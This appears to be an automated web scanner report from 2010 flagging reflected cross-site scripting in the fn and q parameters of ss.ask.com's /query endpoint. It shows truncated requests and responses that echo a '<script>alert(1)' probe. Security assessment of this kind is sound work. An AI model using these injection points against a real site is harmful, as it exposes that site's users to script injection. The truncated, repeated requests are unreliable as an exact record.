1. Cross-site scripting (reflected)
1.1. http://ss.ask.com/query [fn parameter]
1.2. http://ss.ask.com/query [q parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://ss.ask.com |
Path: | /query |
GET /query?sstype=prefix&fn Accept: */* Referer: http://www.ask.com/?o=0&l Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ss.ask.com Proxy-Connection: Keep-Alive Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=U2F0LTIwLU5 |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:53:44 GMT Server: Apache/2.2.13 (Unix) Content-Length: 709 Content-Type: text/javascript searchSuggestionf9815<script>alert(1)< ["<span class=\\\"suggest\\\">los angele</span>s short film festival","<span class=\\\"suggest\\\">los angele</span>s","<span ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ss.ask.com |
Path: | /query |
GET /query?sstype=prefix&fn Accept: */* Referer: http://www.ask.com/?o=0&l Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: ss.ask.com Proxy-Connection: Keep-Alive Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=U2F0LTIwLU5 |
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 16:53:46 GMT Server: Apache/2.2.13 (Unix) Content-Length: 79 Content-Type: text/javascript searchSuggestion(["los angelef1910<script>alert(1)< []]); |